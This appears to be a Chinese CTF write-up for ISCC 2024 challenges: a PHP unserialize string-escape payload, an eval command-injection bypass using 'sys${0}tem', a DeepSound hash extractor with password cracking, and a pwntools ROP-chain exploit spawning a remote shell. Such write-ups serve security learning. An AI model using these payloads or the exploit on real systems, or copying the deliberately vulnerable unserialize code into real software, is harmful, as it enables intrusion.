web
狂飙
打开容器发现是一个电视剧《狂飙》里边的经典片段,提示你输入经典台词。
直接找到代码界面。
代码链接为:101.200.138.180:9999/getevidence.php
<?php
include("./2024ISCC.php");
// Welcome to ISCC. In this challenge you play the police officer from the
// TV series "The Knockout" (狂飙): look for the key evidence and arrest the
// suspect.
//
// NOTE(review): $tips and $flag are read below but never assigned in this
// file; presumably the included 2024ISCC.php defines them -- confirm.
$code = file_get_contents(__FILE__);
highlight_string($code);

// Carrier for the user-controlled string. Only $work comes from the
// request (via __construct); $awarding starts as "salary" and the flag
// check at the bottom wants "pennant", a value the user can only reach by
// smuggling a second property past serialize() -- see filter().
class police
{
    public $work;
    public $awarding = "salary";
    public function __construct($a)
    {
        $this ->work = $a;
    }
    // Runs whenever a police object is destroyed, including the temporary
    // produced by unserialize($a) below. It echoes "I am a police officer,
    // fighting crime is my duty", replaces $work with a suspect and reads
    // two undeclared properties, which goes through suspect::__get().
    public function __destruct()
    {
        echo "我是一名人民警察,打击违法犯罪义不容辞<br>";
        $this-> work = new suspect();
        echo $this-> work -> evidence_video;
        echo $this-> work -> evidence_fingerprint;
    }
}

// Evidence holder. Both properties are private, so their serialized names
// carry the "\0suspect\0" prefix (the write-up's payload encodes them as
// s:14:"suspectvideo" / s:20:"suspectfingerprint" with the NUL bytes).
class suspect
{
    private $video;
    private $fingerprint;
    // Called for reads of undeclared/inaccessible properties. It only prints
    // a taunt ("... can't be obtained that easily") and returns null, so the
    // echoes in police::__destruct() print nothing beyond that taunt.
    public function __get($name)
    {
        if($name == "evidence_video")
        {
            echo "property.transactions怎么可能这么容易获得呢?<br>";
        }
        else
        {
            echo "blood.fingerprint怎么可能这么容易获得呢?<br>";
        }
    }
    // Runs when a suspect is used as a string (e.g. echoed by
    // tools::__invoke()); fills the private fields and returns "you almost
    // got the evidence".
    public function __toString()
    {
        $this -> video = "property.transactions";
        $this -> fingerprint = "blood.fingerprint";
        return "差点就让你获得证据了<br>";
    }
}

// Second gadget class. Nothing in this file calls a tools object, so
// __invoke() never runs here; its echo of $object is what would trigger
// suspect::__toString() if $object held a suspect.
class tools
{
    public $object;
    private $camera = 0;
    private $technology = 0;
    public function __construct()
    {
        // "camera and technology can find the clues"
        echo "使用camera和technology可以找到蛛丝马迹<br>";
    }
    public function __invoke()
    {
        $this -> camera = 1;
        $this -> technology = 1;
        echo $this->object;
    }
}

// The vulnerability. Replaces each 4-byte "evil" with 5-byte "light" AFTER
// serialize() has already written the string length (s:N:"..."), so every
// occurrence makes the data one byte longer than declared. unserialize()
// reads exactly N bytes for $work and parses the leftover bytes as further
// properties of the police object -- a length-based unserialize string
// escape. The write-up uses 32 occurrences to cover the 32-character tail
// ";s:8:"awarding";s:7:"pennant";} it appends.
function filter($name)
{
    $safe = "evil";
    $name = str_replace($safe, "light", $name);
    return $name;
}

// Entry point. ?evidence= is untrusted input that is serialized, mangled by
// filter() and then handed straight to unserialize(). Deserializing
// attacker-influenced data is what this challenge is built on; real code
// must never unserialize() request data (use a data-only format such as
// JSON, or at the very least pass allowed_classes => false).
if (isset($_GET["evidence"]))
{
    $a = filter(serialize(new police($_GET["evidence"])));
    echo $a;
    // 'global' at file scope is a no-op; $tips is simply the global here.
    global $tips;
    // Two conditions: $tips must appear somewhere in the filtered string,
    // and the unserialized object must carry awarding == "pennant". The
    // temporary police object is released once the expression is done,
    // which runs its __destruct().
    if((strpos($a, $tips) !== false) && unserialize($a) -> awarding == "pennant")
    {
        global $flag;
        echo $flag;
    }
}
?>
经分析这是 PHP 反序列化字符串逃逸(长度逃逸):filter() 把 4 字节的 evil 替换成 5 字节的 light,每出现一次字符串就多出 1 个字节,而 serialize() 已经按原长度写好了 s:N,因此多出来的字节会被 unserialize() 当作后续属性继续解析。需要逃逸出的尾部 `";s:8:"awarding";s:7:"pennant";}` 恰好 32 个字符,所以填 32 个 evil。再根据题目给出的线索得到 $tips 的值(strpos 要求它出现在序列化字符串中),一并写进 payload 即可。
?evidence=O:5:%22tools%22:3:{s:6:%22object%22;O:7:%22suspect%22:2:{s:14:%22suspectvideo%22;s:21:%22property.transactions%22;s:20:%22suspectfingerprint%22;s:17:%22blood.fingerprint%22;}s:13:%22toolscamera%22;i:1;s:17:%22toolstechnology%22;i:1;}evilevilevilevilevilevilevilevilevilevilevilevilevilevilevilevilevilevilevilevilevilevilevilevilevilevilevilevilevilevilevilevil%22;s:8:%22awarding%22;s:7:%22pennant%22;}
直接拿到flag的值。
ISCC{nSpyRnAR1ps2xKwa}
最喜欢的一集
首先打开容器,提示你去welcome.php下,直接访问,发现是代码审计的题目,先看代码的意思。
代码先接收 ISCC 参数,转成小写后赋给 str,再用 foreach 遍历上面的黑名单数组做两层检查:第一层用 strpos 判断黑名单关键字是否出现在 str 中(strpos 返回前一个字符串在后一个字符串中首次出现的位置),第二层是正则匹配。两层都通过后,字符串才会交给 eval()。
然后用eval()函数去执行里边的字符串执行命令操作。
http://101.200.138.180:34567/welcome.php?ISCC=eval("sys${0}tem('ls /');")
${0} 并不是"截断":它插在 system 中间,使黑名单和正则在检查参数时看不到完整的 system 关键字;而 eval 执行双引号字符串时,${0} 被当作变量 $0 插值,这个变量通常未定义,结果为空字符串,于是 "sys${0}tem" 又拼回 system。接下来直接读取文件即可,发现 cat、tac、more 都被过滤掉了,换用 tail 即可。
http://101.200.138.180:34567/welcome.php?ISCC=eval("sys${0}tem('tail /flaaaaaaaaagggggg');")
拿到flag。
ISCC{6mXz9rkC9JfMIoGh}
misc
重隐
直接下载附件发现就是一个音频和图片,图片直接拖拽到010里边发现就是好像里边有压缩包,直接进行分离发现压缩包解压,发现有密码。
接下来分析音频:拖进 DeepSound 发现需要密码。用 John the Ripper 自带的 deepsound2john.py 从 wav 中提取口令哈希(输出为 `文件名:$dynamic_1529$<哈希>` 格式,可直接交给 john 爆破),脚本代码如下。
import logging
import os
import sys
import textwrap
def decode_data_low(buf):
    """Decode a low-quality DeepSound buffer: keep every second byte."""
    every_other = slice(None, None, 2)
    return buf[every_other]
def decode_data_normal(buf):
    """Decode a normal-quality DeepSound buffer.

    Every 4 input bytes yield one output byte: the low nibble of byte 0
    becomes the high nibble of the result and the low nibble of byte 2 the
    low nibble; bytes 1 and 3 are not looked at.
    """
    decoded = bytearray()
    for offset in range(0, len(buf), 4):
        high_nibble = (buf[offset] & 0x0F) << 4
        low_nibble = buf[offset + 2] & 0x0F
        decoded.append(high_nibble | low_nibble)
    return decoded
def decode_data_high(buf):
    """Decode a high-quality DeepSound buffer.

    Every 8 input bytes yield one output byte, assembled from the two low
    bits of bytes 0, 2, 4 and 6 (most significant pair first); the odd
    bytes are not looked at.
    """
    decoded = bytearray()
    for offset in range(0, len(buf), 8):
        value = 0
        for step in range(4):
            value = (value << 2) | (buf[offset + 2 * step] & 0x03)
        decoded.append(value)
    return decoded
def is_magic(buf):
    """Return True if *buf* begins with the DeepSound ``DSCF`` marker.

    The marker is checked in the normal-quality layout (one source byte
    spread over the low nibbles of input bytes 4k and 4k+2), so only those
    eight bytes are examined -- the buffer is never fully decoded.
    """
    for index, expected in enumerate(b'DSCF'):
        base = 4 * index
        if (buf[base] & 0x0F) != (expected >> 4):
            return False
        if (buf[base + 2] & 0x0F) != (expected & 0x0F):
            return False
    return True
def is_wave(buf):
    """Return True if *buf* starts with a RIFF/WAVE container header.

    Only the two four-byte tags at offsets 0 and 8 are compared; the
    chunk size in between is ignored.
    """
    riff_tag = buf[0:4]
    wave_tag = buf[8:12]
    return riff_tag == b'RIFF' and wave_tag == b'WAVE'
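def process_deepsound_file(f):
    """Extract the DeepSound password hash from one open ``.wav`` file.

    Scans *f* (a binary, seekable file object with a ``.name``) byte by
    byte for the ``DSCF`` marker, decodes the 104-byte header with the
    normal-quality scheme, validates the mode and encryption fields and
    prints one John the Ripper ``name:$dynamic_1529$<hex>`` line to
    stdout. Always returns None; problems are reported through logging.
    Sets the module global ``convert_warn`` when the input is not a WAV
    file so the caller can print a conversion hint once at exit.
    """
    global convert_warn
    bname = os.path.basename(f.name)
    logger = logging.getLogger(bname)

    # Only RIFF/WAVE containers are handled; anything else is skipped.
    buf = f.read(12)
    if not is_wave(buf):
        logger.error('file not in .wav format')
        convert_warn = True
        return
    f.seek(0, os.SEEK_SET)

    # Scan for the marker one byte at a time: the header is not at a fixed
    # offset, and is_magic() only looks at the nibbles that decode to DSCF.
    hdrsz = 104
    hdr = None
    while True:
        off = f.tell()
        buf = f.read(hdrsz)
        if len(buf) < hdrsz:
            break
        if is_magic(buf):
            hdr = decode_data_normal(buf)
            logger.info('found DeepSound header at offset %i', off)
            break
        f.seek(-hdrsz + 1, os.SEEK_CUR)
    if hdr is None:
        # logger.warn() is deprecated and removed in Python 3.13.
        logger.warning('does not appear to be a DeepSound file')
        return

    # Decoded header layout as used here: bytes 0-3 magic, 4 quality mode,
    # 5 encryption flag, 6-25 the 20-byte digest handed to john.
    mode = hdr[4]
    encrypted = hdr[5]
    modes = {2: 'low', 4: 'normal', 8: 'high'}
    if mode in modes:
        logger.info('data is encoded in %s-quality mode', modes[mode])
    else:
        # Log the raw value: the original indexed `modes[mode]` here, which
        # raised KeyError for exactly the modes this branch exists for.
        logger.error('unexpected data encoding mode %i', mode)
        return
    if encrypted == 0:
        logger.warning('file is not encrypted')
        return
    elif encrypted != 1:
        logger.error('unexpected encryption flag %i', encrypted)
        return
    sha1 = hdr[6:6+20]
    print('%s:$dynamic_1529$%s' % (bname, sha1.hex()))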
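if __name__ == '__main__':
    import argparse
    parser = argparse.ArgumentParser(
        description='Print DeepSound password hashes in John the Ripper format.')
    parser.add_argument('--verbose', '-v', action='store_true')
    parser.add_argument('files', nargs='+', metavar='file',
                        type=argparse.FileType('rb', bufsize=4096))
    args = parser.parse_args()
    logging.basicConfig(level=logging.INFO if args.verbose else logging.WARN)
    # Set by process_deepsound_file() when an input is not a .wav file.
    convert_warn = False
    for f in args.files:
        # argparse opened the file for us; close it once the scan is done.
        with f:
            process_deepsound_file(f)
    if convert_warn:
        # The pasted original called textwrap.dedent.rstrip() with no text,
        # which raises AttributeError instead of printing anything.
        print(textwrap.dedent('''\
            Warning: one or more inputs were not in .wav format and were
            skipped. Convert them to WAV and run this script again.''').rstrip(),
              file=sys.stderr)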
把上一步得到的哈希放到 Kali 里用 john 爆破。
爆破出密码为teenager
导出文件为
直接在线找文字盲水印提取工具。[文本隐水印 (guofei.site)](https://www.guofei.site/pictures_for_blog/app/text_watermark/v1.html)
base64解码得到一部分flag。74_re2l_w4t3rm4rk}。
再分析音频文件发现是手机拨号的声音。
直接在线DTMF Decoder在线解码,再对照手机上的九键找到对应的字母,拿到密码。
但是必须为大写。解压后拿到flag.txt,直接进行解码即可得到前半段flag的值。
所以flag的值为:ISCC{y0u_f1nd_t74_re2l_w4t3rm4rk}
pwn
curious
首先下载附件然后直接拖拽到IDA里边进行分析,先找到主函数,题目换了字典序列,将大小写反转,解码即可得到flag的值。
程序存在栈溢出且是静态编译(地址固定,二进制自身 gadget 充足),直接构造 ROP 链即可。下面的链与 ROPgadget --ropchain 生成的形式一致:先把 /bin//sh 写进可写地址,再布置寄存器并触发系统调用起 shell;各 gadget 的具体含义需在 IDA 中对照确认。
拿到flag的值。
ISCC{itHIyaLc8vuIrO8tHJylJlzw2oPgwxPpj2Jg}
脚本如下:
from pwn import *
from struct import pack
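context.os = 'linux'
elf = ELF("./pwn1")
io = remote('182.92.237.102', 10031)

# ROP chain for the statically linked ./pwn1. Every address is absolute
# (no PIE) and specific to this build. The layout matches what
# ROPgadget --ropchain emits (store "/bin//sh" at a writable address,
# zero the qword after it, load the argument registers, repeat one gadget
# 59 times, then issue the syscall); the per-gadget meanings are only
# inferred from that shape -- confirm them in a disassembler before
# reusing the chain against any other binary.
DATA = 0x00000000004c20e0          # writable slot that receives "/bin//sh"
REPEATED_GADGET = 0x00000000004788c0
REPEAT_COUNT = 59                  # 59 is also __NR_execve on x86-64

chain = [
    0x000000000040f49e,
    DATA,
    0x0000000000452af7,
    b'/bin//sh',
    0x0000000000483b85,
    0x000000000040f49e,
    DATA + 8,
    0x0000000000446ef9,
    0x0000000000483b85,
    0x0000000000401912,
    DATA,
    0x000000000040f49e,
    DATA + 8,
    0x000000000040181f,
    DATA + 8,
    0x0000000000446ef9,
]
chain += [REPEATED_GADGET] * REPEAT_COUNT
chain.append(0x00000000004012d3)

# Byte-identical to the original 76 hand-written pack() lines.
p = b''.join(item if isinstance(item, bytes) else pack('<Q', item)
             for item in chain)

# 0x28 bytes of filler, presumably the distance from the overflowed buffer
# to the saved return address (verify in the debugger), then the chain.
payload = b"a" * 0x28 + p
io.send(b'oh1yes')
io.sendline(b'1')
io.sendline(payload)
io.interactive()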